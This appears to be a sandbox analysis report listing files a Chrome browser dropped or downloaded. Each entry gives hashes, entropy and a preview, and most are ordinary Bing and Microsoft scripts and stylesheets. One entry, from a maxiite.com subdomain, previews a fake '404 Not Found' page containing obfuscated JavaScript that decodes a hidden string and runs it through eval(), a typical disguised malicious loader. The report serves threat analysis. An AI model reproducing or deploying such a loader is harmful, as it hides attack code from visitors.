                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1663), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1663
                                                                            Entropy (8bit):5.118614360470706
                                                                            Encrypted:false
                                                                            SSDEEP:24:2QAKJFFGRc/spJg2WNaQorUcn7RzdAHWd3TRdZhtRkYAe/V5r0nA97StrLntMPU6:wKJFkimqjcrw4D/tD9VWcS1etkEy96vZ
                                                                            MD5:D81844C2EBCF5F3260A692E3E89DDE7F
                                                                            SHA1:5A3874FB9F597E42FDD94E5BC5DA0A709B70D57A
                                                                            SHA-256:9905F086F3F40AC4B8EC2C9F0752A157ED637B2FFC2C87971E8306D6CB12FE9F
                                                                            SHA-512:8005F3EBD5BC8DC903917DF581563595EA3E427F31992260AA4E6ED8BC30095442174AD153A83C378575FFB2DE878338B0E87D8CDD57DFDC49E646CA9E4ADA77
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){function v(){n&&(sj_be(_d.body,"click",y),sj_be(n,"click",p),f&&sj_be(f,"click",w),sj_evt.bind("PrimaryNavDropdownMenuShow",i),sj_evt.bind("scs_openflyout",i))}function y(){typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)&&i()}function p(r){r.stopPropagation();typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)?i():b()}function w(n){n.stopPropagation();var t=s(n.target);t!=null&&Log&&Log.Log&&Log.Log("Click",u,"ScopeDropdownMenuItemClick",!1,"ItemId",t.id);c.trigger(i,null)}function s(n){return n===null?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,e)||Lib.CssClass.contains(n,"b_sp_over_cont")?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,a)?n:n.parentElement?s(n.parentElement):null}function b(){sj_evt.fire("ScopeDropdownMenuShow");typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(n,t);r&&typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(r,o);Log&&Log.Log&&Log.Log("Show",u,"ScopeDropdownMenuShow");n.setAttribute("aria
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65320), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):199286
                                                                            Entropy (8bit):4.882018513397515
                                                                            Encrypted:false
                                                                            SSDEEP:1536:wmE4Wxk91QDON5AZmnK+KLeWqGurYeCPmEfPsEF:wmMxyl0eCPmEfPsEF
                                                                            MD5:99794548F02454FDDF4A40D1868D72E6
                                                                            SHA1:9FEF89DAB53B6CA8A69CFD23D0DC333356E634B8
                                                                            SHA-256:C16CF00AF377BA6E94BD905696FFB6CC8EA759B0A2C7256F4D715E7B5DBD8BDB
                                                                            SHA-512:86034F7E90906719BA2D98A0DCA9EFD87C65698005E0250AB380481F61DC16D9FCA9AA1B1EB74DB6704A6494FE13AEC8CA87E61B6F31C84C6FF3F3245CD4117D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/css/lib/bootstrap/bootstrap-namespaced.min.css
                                                                            Preview:/*!.. * Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.bootstrap-namespace{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}.bootstrap-namespace *, .bootstrap-namespa
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2128), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2128
                                                                            Entropy (8bit):5.442460477719289
                                                                            Encrypted:false
                                                                            SSDEEP:48:tj4UnhFYnV9BxNW42yoJPDvDy39YTNwtuu0/px0aBw/V966:OYFGjMlS9YTKtuuSpx0aBkV966
                                                                            MD5:ABA86A34F3FDBCB7DFE2255FD75141D8
                                                                            SHA1:1266746DDFD30DB4F4DB60A1DF92CE696378F7FD
                                                                            SHA-256:FA3C61A6725A959DCCDA1A97E82B433EF359B49D646A5D389CC47822085B5A2D
                                                                            SHA-512:EC138E078F3E379C40A7CF2C674CA9CC06A3F985C76A2940CA797D39202513053B6A4EA2ECE875A303AAFB2CC2004EE2C5AA4A6DF1C31C09AA3556BA952CEF4C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SHlochelper;(function(n){function t(n,t){var u=n.split("?"),f,i,r;if(u.length>=2){for(f=encodeURIComponent(t)+"=",i=u[1].split(/[&]/g),r=i.length-1;r>=0;r--)i[r].lastIndexOf(f,0)!==-1&&i.splice(r,1);return u[0]+(i.length>0?"?"+i.join("&"):"")}return n}function r(n){var r,s,t;if(typeof _w.Log2!="undefined"&&Log2.LogEvent)Log2.LogEvent("ClientInst",n,null,null,null,null,null,null),Log2.ForceFlush&&(r={force:!0,useSendBeacon:!0},Log2.ForceFlush(!0,r));else{var u="/fd/ls/lsp.aspx",f=(new Date).getTime(),h="<E><T>Event.ClientInst<\/T><IG>"+_G.IG+"<\/IG><TS>"+f+"<\/TS><D><![CDATA[["+n.replace("]\]>","]]]\]><![CDATA[>")+"]]\]><\/D><\/E>",e="<ClientInstRequest><Events>"+h+"<\/Events><STS>"+f+"<\/STS><\/ClientInstRequest>",o=!1;navigator&&navigator[i]&&(s=new Blob([e],{type:"text/plain"}),o=navigator[i](u,s));o||(t=sj_gx(),t.open("POST",u,!0),t.setRequestHeader("Content-Type","text/xml"),t.send(e))}}function u(n){if(n){for(var t=_w,i=n.split("."),u=i.length,r=0;t&&r<u;)t=t[i[r++]];return t}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1725
                                                                            Entropy (8bit):5.274895734185393
                                                                            Encrypted:false
                                                                            SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                            MD5:2EF3074238B080B648E9A10429D67405
                                                                            SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                            SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                            SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/FdV4c_-YGVxX40_HeKzMQcIRcuc.js
                                                                            Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):128
                                                                            Entropy (8bit):4.784478509770579
                                                                            Encrypted:false
                                                                            SSDEEP:3:2LGfgKouvFf6on6ASbEmez5MNLfu1xo1ZRFfPFjMci9fBzqM:2LGIKp56bASgz5MNLW1u1ZXPFwci9dqM
                                                                            MD5:08F7C1DC1AAF048802ADC436D9D542BF
                                                                            SHA1:C92D616F5DA1E5C3CC42C5ED4C74E57592779FFB
                                                                            SHA-256:4B2BFE5490E08692E57A12ADA60C818B163C800E17C7C2B91F79FF6D530F5F60
                                                                            SHA-512:CE968BFA7ADA540F2A49123830E55197CADDCAE083CA2363581508B815DDB3B5594F642D455D0002E29A2BC4017F496D8D174A142692CF18E0F6D20B1A836B25
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(n,t){onload=function(){_G.BPT=new Date;n&&n();!_w.sb_ppCPL&&t&&sb_st(function(){t(new Date)},0)}})(_w.onload,_w.si_PP)
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (19011), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):19011
                                                                            Entropy (8bit):5.408278425757407
                                                                            Encrypted:false
                                                                            SSDEEP:192:kCj8wH0f8w254RfGoLqrl5E5QeOcnGL0uaWLu15tcYJsdxzmv/exXzQUQqHGi/kZ:kvwH0n254xGoLqUVOcYdFQUU1P
                                                                            MD5:89C6BD181625110BF0E6A80D1DEE8173
                                                                            SHA1:CCFE3CB9187A9279B835A173F3F1E2638E7F5D5D
                                                                            SHA-256:1D943BF563627A4234B72B577D5B163F5E0C5B13497872908DC36464734A325F
                                                                            SHA-512:3F08C9090444802D4FFE937DF12BD37E96F4CB0CA0CDFEEC580776BF21B80D5E3DFEF0E218E7E0788F5161DCE081D11AA5B1F2273397375213A4DC4E1357BE9F
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/zP48uRh6knm4NaFz8_HiY45_XV0.js
                                                                            Preview:var __assign=this&&this.__assign||function(){return __assign=Object.assign||function(n){for(var t,r,i=1,u=arguments.length;i<u;i++){t=arguments[i];for(r in t)Object.prototype.hasOwnProperty.call(t,r)&&(n[r]=t[r])}return n},__assign.apply(this,arguments)},__spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},LGUtility;(function(n){function ei(){sj_evt.bind(h,oi,!0);sj_evt.bind("bfbMainlineAnswerRemoved",vt,!0);sj_evt.bind("bfbPreExpanded",vt,!0);sj_evt.bind(ri,ci,!0)}function oi(n){var e,o,s;try{if(n[2]){var t=n[1],h=_ge(f(t)),r=h.getBoundingClientRect();fi&&!r.height?(e={name:"InvalidRender",message:"Widget did not have a height during render event"},st(t,e)):(o=u[t],u[t]={name:t,top:r.top+_w.scrollY,bottom:r.bottom+_w.scrollY},o?(s=pt(t),i.splice(s,1),yt(t)):yt(t))}et(n[1],!1)}catch(c){g=!0;st(n[1],c)}}functio
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:V:V
                                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:0
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1238), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1238
                                                                            Entropy (8bit):5.036109751467472
                                                                            Encrypted:false
                                                                            SSDEEP:24:6VfG6V5FpGjNOBE2ey3nXmaDU6CWiArShS9jHRRoy5++vGqSEqSs:S5lBiz6U6C8nH/+L4A
                                                                            MD5:77B3494B9357D848276019DB087DACD9
                                                                            SHA1:AE64A8EE51251498EA85CFE1D38DB23AB26C3F29
                                                                            SHA-256:F332B88324F67C9DEB79CA7D33BD57F161E39567E774E4FDD5C0509205E60B9B
                                                                            SHA-512:1BB59C6DBCF0C33DE192E4423DD321362811AD2C1F82665D737327580964C4A857AE35D4AAC902F33DBA89CEFDC9A87C7D4E5797D493BE2D66B5710F54F85154
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var Feedback;(function(n){var t;(function(){"use strict";function e(t,i){var r=t.getAttribute("id"),u;r||(r="genId"+n.length,t.setAttribute("id",r));u=new f(r,i,t.getAttribute(i));n.push(u)}function i(n,t,i){i===null?n.removeAttribute(t):n.setAttribute(t,i)}function t(n,t,r,u){for(var f,s=_d.querySelectorAll(r),o=0;o<s.length;o++)(f=s[o],u&&f.id&&u[f.id])||(e(f,n),i(f,n,t))}function o(n){for(var u=_d.querySelectorAll(n),e=1,f={},t,i,r=0;r<u.length;++r){if(t=u[r],!t.id){for(;;)if(i="fbpgdgelem".concat(e++),!_ge(i))break;t.id=i}f[t.id]=t}return f}function r(){var i="tabindex",r="-1",n=o("#fbpgdg, #fbpgdg *");t(i,r,"div",n);t(i,r,"svg",n);t(i,r,"a",n);t(i,r,"li",n);t(i,r,"input",n);t(i,r,"select",n);t("aria-hidden","true","body :not(script):not(style)",n)}function u(){var t,f;for(sj_evt.unbind("ajax.feedback.init",r),sj_evt.unbind("ajax.feedback.cleanup",u),t=0;t<n.length;t++)f=_d.getElementById(n[t].id),f&&i(f,n[t].attributeName,n[t].originalAttributeValue);n.length=0}var n=[],f=function
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (560), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):560
                                                                            Entropy (8bit):4.742600822971018
                                                                            Encrypted:false
                                                                            SSDEEP:12:CFmwsCfyMJoAfrk3bV0tRWERW5kTGb3aINVN/t/jgClRXirA:CFmNWaAwRCRWERW5kTGb3l1tMClRd
                                                                            MD5:9B28631B7C46706DBB7EEF2D16D9549B
                                                                            SHA1:2A463D97AF924D3B10C250181D0D902562494184
                                                                            SHA-256:F8FA36AB6505DA51BEF5521EF84793391BE9C16DE5ABD6BB99C20FE4D1FB48CF
                                                                            SHA-512:9E85DB806D0CBEEC5007D0AB90BEFA6CB036995110637EC616D93FCC4A2A9BAF59BB0ABEF98913E5D9FD88BE445C9ABC04E0B6C7533E4384F945CB743A4CF488
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/KkY9l6-STTsQwlAYHQ2QJWJJQYQ.js
                                                                            Preview:var Lib;(function(n){var t;(function(n){function t(n){return n&&n.classList}function i(n,i){t(n)&&n.classList.add(i)}function r(n,i){t(n)&&n.classList.remove(i)}function u(n,i){t(n)&&n.classList.toggle(i)}function f(n,i){return t(n)&&n.classList.contains(i)}function e(n,t){return n.getElementsByClassName?n.getElementsByClassName(t):null}function o(n){return n instanceof SVGElement?n.getAttribute("class"):n.className}n.add=i;n.remove=r;n.toggle=u;n.contains=f;n.getElementByClassName=e;n.getClassAttribute=o})(t=n.CssClass||(n.CssClass={}))})(Lib||(Lib={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):95
                                                                            Entropy (8bit):5.082653371329429
                                                                            Encrypted:false
                                                                            SSDEEP:3:YXqLzjmYLHsXTlAFQXDMLOcrFw8gMCMY:YXq7TMXxAFQzbc+QY
                                                                            MD5:E17CCD8E2E22741360A6D694F56E9CF5
                                                                            SHA1:A9DFB01F4F46CDDA0FD09AE8BF22C98EE3437166
                                                                            SHA-256:01BE2BC2E0700F7664F3F56DA32B59C9AF7104949A162B86547DCB32ADB338C4
                                                                            SHA-512:C9FCFA56370D99C968D802B2E7525FFB3868BFA17B7655A6EA53773B84782D29A663FF2F00AD786BED2FB0182E86754AFF96B46A29CA15B4C91D668ACC043457
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/qd-wH09GzdoP0JrovyLJjuNDcWY.css
                                                                            Preview:.b_logo:after{position:absolute}.b_logo:after{content:url(/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                            Category:downloaded
                                                                            Size (bytes):171505
                                                                            Entropy (8bit):5.043804815226508
                                                                            Encrypted:false
                                                                            SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                            MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                            SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                            SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                            SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                            Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (321), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):321
                                                                            Entropy (8bit):5.359484461172198
                                                                            Encrypted:false
                                                                            SSDEEP:6:q0DvMPPb+jF+t2rS95gW/IVKUx8d4A1q1LdEWPrACun:nmPb78tW/+Krd4zEwUn
                                                                            MD5:F2E9C49BDE80A584AAC65A19B0D92CF1
                                                                            SHA1:AF40E39321557749551BE024AF218BCE747427D3
                                                                            SHA-256:EB6721D635DA2BA960FFF0D2F4CDA9973B76667AEEB19C2495DD28E0E4F927D7
                                                                            SHA-512:712EA928A8F6F7C3D3BFA8FD7E1D85EC030F06EAF986602246BB9423054E3AC8F48F2FAF2315AABA95442C8DB3DE73BBEBC85A53867476CB42DC32829853A328
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/r0DjkyFVd0lVG-AkryGLznR0J9M.js
                                                                            Preview:var NewTabOptout;(function(n){function t(n){sj_evt.bind("ntf_newtabfiltoggled",function(t){sj_cook.set("SRCHHPGUSR","EXLKNT",t[1]?"1":"0");n&&_w.location.reload()});var t=sj_cook.get("SRCHHPGUSR","EXLTT"),i=t?parseInt(t)+1:1;sj_cook.set("SRCHHPGUSR","EXLTT",i.toString())}n.NewTabInit=t})(NewTabOptout||(NewTabOptout={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1376), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1376
                                                                            Entropy (8bit):5.183326060548361
                                                                            Encrypted:false
                                                                            SSDEEP:24:xes+ZgaixKRl9Kcyl1KMq9rK2nJYK8LqELkpKMB3gVUVUGAKKU41w7R/muErDxKJ:Hyio8i57FbPUjR+FmuE/W2OO/O
                                                                            MD5:8FD803E13A4417C0B1B77F0FA847E9BB
                                                                            SHA1:9300E169BBBB02C4B4FC0846C2CC7A6340EB8DBA
                                                                            SHA-256:2E4E6FD8FE0E41D60CE96B862330776AE4D6E2B2617608D22A25D58C74176F30
                                                                            SHA-512:6F7F325754D97715D9429D7CC22D94BDD5D9EAFCBC5067AB9F0623616547049915926D944170B2FDE1BEFDED5F3D11644900CEB374628A37781994585109714A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/kwDhabu7AsS0_AhGwsx6Y0Drjbo.css
                                                                            Preview:.b_deep ul{width:230px}#b_results{width:648px}html body,body #b_header{min-width:var(--bminwidth,1362px)}#b_context{width:432px}.b_poleContent{width:1160px}@media(max-width:1406.9px){#b_content{--rgutter:40px;--crleft:848px}}@media(max-width:883.9px){#b_content{--rgutter:20px;--crleft:828px}}@media(max-width:1362.9px){body{--bminwidth:1232px}#b_context{width:344px}.b_poleContent{width:1072px}#id_h #id_rbh,#idCont #id_h #id_rbh{display:none}}@media(max-width:1274.9px){body{--bminwidth:1164px}#b_context{width:256px}#b_header #id_h{right:0}#id_h #id_rh,#id_h #id_rbh{padding-left:8px}.b_poleContent{width:1004px}}@media(max-width:1189.9px){body.b_norr #id_h #id_n{display:none}body.b_norr{--bminwidth:1084px}}@media(max-width:838.9px){.b_respl #b_content{--lgutter:113px;--lgutterrev:-113px;--polepadl:133px;--polepadl2:133px;--dtabpadl:125px;--crleft:801px;--bzaimgoffsetx:-50px}body:not(.b_sydConvMode) .b_scopebar{--lgutter:113px}}@media(max-width:791.9px){.b_respl #b_content{--lgutter:66px;--
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (1527), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1527
                                                                            Entropy (8bit):5.460565571228186
                                                                            Encrypted:false
                                                                            SSDEEP:24:kTeRWQZG+6uSseKyT5Vab5vPxm6ojjmlMhCbDD+WGxpDukoUgkMFw4Q6DZjfLLkO:8eNM+TEBXIZToXm+hCbfFGx5ukZ0w4Qk
                                                                            MD5:DFF022058495AFBC09664D8E806C2F1A
                                                                            SHA1:B70A24B3E75014E3A4DD66DB7DDA97D32D9CBBDB
                                                                            SHA-256:0F0AD447B9300C73E6F0216B73CB655EFFBCE1A5A979585E187BA0CD98F17425
                                                                            SHA-512:27C629B208EA30FBA941992C14A2A194A31498E60E0B3A882411B2D5059628D50957BB1D7AAD3CC798EBA7FEAC47DE4E613265CE03C8C03AA48B53E59C627F52
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://jkqbjwq.maxiite.com/
                                                                            Preview:<html><head><title>404 Not Found</title><meta name='referrer' content='no-referrer'><script> if (window.self!='google.com') {var _0xc65e=["","split","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/","slice","indexOf","","",".","pow","reduce","reverse","0"];function _0xe4c(d,e,f){var g=_0xc65e[2][_0xc65e[1]](_0xc65e[0]);var h=g[_0xc65e[3]](0,e);var i=g[_0xc65e[3]](0,f);var j=d[_0xc65e[1]](_0xc65e[0])[_0xc65e[10]]()[_0xc65e[9]](function(a,b,c){if(h[_0xc65e[4]](b)!==-1)return a+=h[_0xc65e[4]](b)*(Math[_0xc65e[8]](e,c))},0);var k=_0xc65e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc65e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe4c(s,e,10)-t)}return decodeURIComponent(escape(r))}("kZZZuHukuukHukkZuHukuZZHukkZkHkZZZuHuZuZZHukukkHukkZkHukZkkHukZkZHukkkuHukuukHukkZkHukkZuHuZuZZHukkukHukuZuHukkuZHukukkHukZkZHukZkk
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):4.908465163481109
                                                                            Encrypted:false
                                                                            SSDEEP:6:qbLkAOpmB4hImTzBwhLM1whA+XzFE8KSiQLGPQQgnaqza:IQA7B2IkzaLMGAMzDBVKY+ia
                                                                            MD5:2166C09EA15BA88E843D4E84DF2C48A3
                                                                            SHA1:CBFF10FF66823D5EF13309A7913C600EEAEBA187
                                                                            SHA-256:02F6E697A3AAB3BE32F5FB28488862BF9ED344B4D60CCDF85CD1E244FF285C62
                                                                            SHA-512:5AD51B625E96AFB5E3452DF6214B1BC63676E46490BFC15EFB3FE00C27ADC35D4336A85D00F9D37A840E3D98B61FD90DED6C5A18452F03033BE9AC4C05AD24B0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var Button;(function(){typeof WireUp!="undefined"&&WireUp.init("button_init",function(n){var t=n.getAttribute("data-appns"),i=n.getAttribute("data-k");sj_be(n,"click",function(){Log.Log("Click","Button","",!1,"AppNS",t,"K",i,"Category","CommonControls")})})})(Button||(Button={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (5541), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):5541
                                                                            Entropy (8bit):5.284077415912716
                                                                            Encrypted:false
                                                                            SSDEEP:96:kiJhScXzjAPVNl6cvPOZWNjJnTddDxxtg2EIECSOsDquOj:kiZEjXOZWb/Dxs2EIEzOsDquOj
                                                                            MD5:B74C06F7269A859029BC7283F86CFEA9
                                                                            SHA1:67674018AC28BA87298B13820CE30236632E2006
                                                                            SHA-256:C97F4ED023D7D8CDAD62F30C2FDB43FA7343ECA62EA0C0BFC90B378DED60DBDA
                                                                            SHA-512:99307CBFDE03CD99643DBE6E744ED10BA89E5E19F5F8E51BE847CEF8735284B170399580A7A851DC71720791098714454C0E05051F7B0EC42AB84A0D98AF94A6
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Z2dAGKwouocpixOCDOMCNmMuIAY.js
                                                                            Preview:var Feedback;(function(n){var t;(function(t){function u(t,r,u,f,e,o){t=typeof t===i?!1:t;t&&scrollTo(0,0);u=typeof u===i?!0:u;n.PackageLoad.Load(r,u,f,e,o)}function o(n,t){for(var r=0,i=null;n&&n.getAttribute&&(!(t>=1)||r<t);){if(i=n.getAttribute("data-fbhlsel"),i!=null)break;r++;n=n.parentNode}return i}function l(t,l,a,v,y,p,w,b,k){function tt(t){var r=null,i;return t&&(i=new h,n.fel("ajax.feedback.collectsettings","gsf",i),r=i.findSettings(t)),r}var d,g,nt;(typeof sj_log!="undefined"&&sj_log("CI.FeedbackInit","Feedback",!l||l.length===0?"invalid":l),d=_ge(l),d&&d.classList&&d.classList.contains(s))||(g=o(d,3),e!=="sb_feedback"&&(e=l,typeof sj_evt!==i&&(r&&sj_evt.unbind(f,r),r=function(n){var f=null,i=null,e=null,s,r,h;n&&n.length>1&&(r=n[1],r.tagName!==undefined&&r.nodeType!==undefined?(f=r,i=tt(f)):i=r,s=i&&i.elementToHighlight||f,e=o(s));h=i&&i.linkId||l;u(v,t,a,h,e,i)},sj_evt.bind(f,r,1)),typeof SearchAppWrapper!==i&&SearchAppWrapper.CortanaApp&&SearchAppWrapper.CortanaApp.addEven
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3053), with CRLF, LF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):308735
                                                                            Entropy (8bit):4.746436371384129
                                                                            Encrypted:false
                                                                            SSDEEP:3072:e4uTXJXWQ7chkwdfBS/L4vqRHtyh6HbIDOFhJMG:e3XWQwvfs/I6hJMG
                                                                            MD5:329289E45D215476C1E059115DE8B464
                                                                            SHA1:7FA0130561FA87F8A46C7C27E962011730EB7DF4
                                                                            SHA-256:11A5A80962200B64EF5032AE53B23293F479E2CD3AA85641AA21729427918DB1
                                                                            SHA-512:8C70B2E4BD71D9CDD035BEB96EE5319422E571F0A3C51DD1782E26019787E9FFFD8B60E463611B96104B868DAB536A632509C36575F3917327AF6F2A7DA11FDE
                                                                            Malicious:false
                                                                            Reputation:low
